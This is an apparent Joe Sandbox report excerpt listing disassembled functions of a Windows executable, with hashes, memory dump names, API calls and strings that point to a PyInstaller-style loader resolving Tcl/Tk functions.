API String ID: 54951025-0
Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction ID: a1eafd717121ba5990ccc514a140e4f87e224454e50da8bca6d43587b1aa9c16
Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction Fuzzy Hash: D0B09220E1BA02D6EE083B296C8221862A4BFA8700FD84138C04C40330DE3C20F66B20

Function 00007FF72B8E35A0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction ID: 45a4d0ee5ea96669fc31b653ac452cccac081c511bdc9f6f310722a34837d776
Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction Fuzzy Hash: 82D1EB62A0869285EB2AAE6DCC4023DA3A0EF45B48F948135ED0D077F5CF3DDC65DB90

Function 00007FF72B8D9800 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction ID: a82fb072c9c0588254e7913b63d122180643188ec4e0b85547a39e1651ccb214
Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction Fuzzy Hash: 9AC1AD762181E08BD289EB29E87947A73E1F78930EBD5406BEF8747785C63CA414DB60

Function 00007FF72B8E2C10 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction ID: 0bfcf133b710b3efae23b5b77a40740ecf58cbd5c07a874cd4951828eb47d13e
Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction Fuzzy Hash: C6B1AF72A0879685E7649F6DC85013CBBA0F749B48FA40135EB8E473A5CF3DD461CBA2

Function 00007FF72B8EE570 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction ID: e5b26cae5d39dbba553ecbcafd227979c4abbf966307b3dc7f4841e793f67eb3
Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction Fuzzy Hash: B681C173A087C186E7B4AB5DD84036AAA91FB46794F904235EA9D43BA9DF3CE410CF50

Function 00007FF72B8F6418 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
Instruction ID: c8b04622dd520d70eecea4a06dce6bafcc6b37653b16d9e336325343a04d279c
Opcode Fuzzy Hash: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
Instruction Fuzzy Hash: 7361F922E0819246F764AABC985063DE680EF65760FD40339E61D466E5DE7DF860CFA0

Function 00007FF72B8E1944 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: df833cc7e08c971afcb3c8ac5214e5617c0787789c3ede2a5e9378869324c69b
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: AF517876A1469185E728BB5DC440338B7A0EB45F58FA44131DE8D177B4DB3EE8A3CB90

Function 00007FF72B8E2164 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: dc11f9b33e2c3c9ce1290501e92dbd54473eb23fd72e4bead3229b0f09ec30ef
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 87518536A1869281E7249F6DC840238B3A1FB54B58F644131EECD077B4CB3EE963CB91

Function 00007FF72B8E1D54 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: b0af0a71f730b733ee913ce3f2d0b3a76db33643cd0eec8bdb36107b0322bac5
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: CE518836B1869281E768AB6DC44023873A0EB45B58F644131EE4D577B4CB3EECA3CBD0

Function 00007FF72B8E1B50 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 1411efd0ffc5fea1f930a672339e6480ec52b055db167e0ed1f043a25635e6ea
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: 0B51C736B1869181E728AF6DC44023867A1EB85F58F644131EE4D577B4DF3EE8A3CB90

Function 00007FF72B8E1740 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: 93a30d006101e2dd337570f0cda25c28025ca23d1f2ac1e5b3d32ea5d0922623
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 52517836B1469185E728AB6DC840638A7A1EB45F58F644131DE4D177B8CF3DE8A2CBD0

Function 00007FF72B8E1F60 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 3a0e0499a4df4cc6ff7c98bd7898b9855ac20c3c7015f243bfefb8b5fa78fd67
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 72519636A1869585E724AF6DC450338A7A0EB44B58F644131EE8C177B5CB3EECA3CBD1

Function 00007FF72B8E5D30 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 2b323ca9ee71de457f5acdf981827eb70b364996ae6a93a2e6483def1c9434b8
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 8941C362D0E7CB05E9A99D9C0C186F4A6C0EF127A0FD812B4FD9D573E3CC0D65A6C560

Function 00007FF72B8E9EA0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction ID: 504a4775f975540a787bfd27988485d2ac4e59e9e030e1d5a06254181a02980f
Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction Fuzzy Hash: 17412462B28A8482EF04DF6ADD14169B3A1FB48FD0B889432EE1D97B64DE3CD0428740

Function 00007FF72B8E80E4 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction ID: b8cdccd96d7cc6d0fccbffa8a9ceb4a08186f7a00bb091d568be1778d94c6eac
Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction Fuzzy Hash: 7631C532B18B8281E764AF696C4013DE6D5EB85BD0F944238FA5D53BE5DF3CE0218B54

Function 00007FF72B8F9570 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction ID: fcd8386463c3b38ae0e9dbaa83a3b589f542e12f32693a3500c18361a56d1274
Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction Fuzzy Hash: 30F049717281559BDF989F6DA80252577E0F7483C0FC0D039D58D83A14DA3CD0519F14

Function 00007FF72B8DD30C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction ID: b7de87f278ea3263ef17a3159c2e9ba4c41c908539eaa1cb9504f6dd44bd9914
Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction Fuzzy Hash: 1DA00221D8CC0BD0E648AB18EC90135A731FB65301FC00072E00D520B0BF3CB425DBA0

Function 00007FF72B8D76C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF72B8D76D7
GetLastError.KERNEL32 ref: 00007FF72B8D76E9
GetProcAddress.KERNEL32 ref: 00007FF72B8D7725
GetLastError.KERNEL32 ref: 00007FF72B8D7737
GetProcAddress.KERNEL32 ref: 00007FF72B8D7750
GetLastError.KERNEL32 ref: 00007FF72B8D7762
GetProcAddress.KERNEL32 ref: 00007FF72B8D777B
GetLastError.KERNEL32 ref: 00007FF72B8D778D
GetProcAddress.KERNEL32 ref: 00007FF72B8D77A9
GetLastError.KERNEL32 ref: 00007FF72B8D77BB
GetProcAddress.KERNEL32 ref: 00007FF72B8D77D7
GetLastError.KERNEL32 ref: 00007FF72B8D77E9
GetProcAddress.KERNEL32 ref: 00007FF72B8D7805
GetLastError.KERNEL32 ref: 00007FF72B8D7817
GetProcAddress.KERNEL32 ref: 00007FF72B8D7833
GetLastError.KERNEL32 ref: 00007FF72B8D7845
GetProcAddress.KERNEL32 ref: 00007FF72B8D7861
GetLastError.KERNEL32 ref: 00007FF72B8D7873

Strings

Tcl_MutexLock, xrefs: 00007FF72B8D78B3, 00007FF72B8D78D5
Tcl_FinalizeThread, xrefs: 00007FF72B8D77CD, 00007FF72B8D77EF
Tcl_Init, xrefs: 00007FF72B8D76D0, 00007FF72B8D76EF
Tcl_NewByteArrayObj, xrefs: 00007FF72B8D7B09, 00007FF72B8D7B2B
Tcl_CreateInterp, xrefs: 00007FF72B8D771B, 00007FF72B8D773D
Tcl_JoinThread, xrefs: 00007FF72B8D7885, 00007FF72B8D78A7
Failed to get address for %hs, xrefs: 00007FF72B8D76F8
Tcl_ThreadAlert, xrefs: 00007FF72B8D79F5, 00007FF72B8D7A17
Tcl_ThreadQueueEvent, xrefs: 00007FF72B8D79C7, 00007FF72B8D79E9
Tcl_CreateObjCommand, xrefs: 00007FF72B8D7A7F, 00007FF72B8D7AA1
Tcl_SetVar2Ex, xrefs: 00007FF72B8D7B37, 00007FF72B8D7B59
GetProcAddress, xrefs: 00007FF72B8D76FF
Tcl_ConditionFinalize, xrefs: 00007FF72B8D793D, 00007FF72B8D795F
Tcl_Alloc, xrefs: 00007FF72B8D7C1D, 00007FF72B8D7C3F
Tcl_Finalize, xrefs: 00007FF72B8D779F, 00007FF72B8D77C1
Tcl_Free, xrefs: 00007FF72B8D7C4B, 00007FF72B8D7C6D
Tcl_SetVar2, xrefs: 00007FF72B8D7A51, 00007FF72B8D7A73
Tcl_DeleteInterp, xrefs: 00007FF72B8D77FB, 00007FF72B8D781D
Tcl_CreateThread, xrefs: 00007FF72B8D7829, 00007FF72B8D784B
Tcl_DoOneEvent, xrefs: 00007FF72B8D7771, 00007FF72B8D7793
Tcl_FindExecutable, xrefs: 00007FF72B8D7746, 00007FF72B8D7768
Tk_GetNumMainWindows, xrefs: 00007FF72B8D7CA7, 00007FF72B8D7CC9
Tcl_EvalFile, xrefs: 00007FF72B8D7B93, 00007FF72B8D7BB5
Tcl_NewStringObj, xrefs: 00007FF72B8D7ADB, 00007FF72B8D7AFD
Tcl_GetCurrentThread, xrefs: 00007FF72B8D7857, 00007FF72B8D7879
Tk_Init, xrefs: 00007FF72B8D7C79, 00007FF72B8D7C9B
Tcl_GetString, xrefs: 00007FF72B8D7AAD, 00007FF72B8D7ACF
Tcl_ConditionWait, xrefs: 00007FF72B8D7999, 00007FF72B8D79BB
Tcl_GetObjResult, xrefs: 00007FF72B8D7B65, 00007FF72B8D7B87
Tcl_MutexFinalize, xrefs: 00007FF72B8D790F, 00007FF72B8D7931
Tcl_ConditionNotify, xrefs: 00007FF72B8D796B, 00007FF72B8D798D
Tcl_EvalObjv, xrefs: 00007FF72B8D7BEF, 00007FF72B8D7C11
Tcl_MutexUnlock, xrefs: 00007FF72B8D78E1, 00007FF72B8D7903
Tcl_EvalEx, xrefs: 00007FF72B8D7BC1, 00007FF72B8D7BE3
Tcl_GetVar2, xrefs: 00007FF72B8D7A23, 00007FF72B8D7A45

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction ID: 808aae6252432a3a7dbb1ef1fb63fbacc1bcfae0b2788b235ad592e946f0c808
Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction Fuzzy Hash: 8602A324E09B07D1EA15BB6DAC505B4A3A1EFA8745FD41032D96E02270FF3CB569DBB0

Function 00007FF72B8D81D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B8D9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B8D45F4,00000000,00007FF72B8D1985), ref: 00007FF72B8D93C9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF72B8D86B7,?,?,00000000,00007FF72B8D3CBB), ref: 00007FF72B8D822C

Part of subcall function 00007FF72B8D2810: MessageBoxW.USER32 ref: 00007FF72B8D28EA

Strings

LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF72B8D829D
CreateDirectory, xrefs: 00007FF72B8D837C
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF72B8D8203
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF72B8D8240
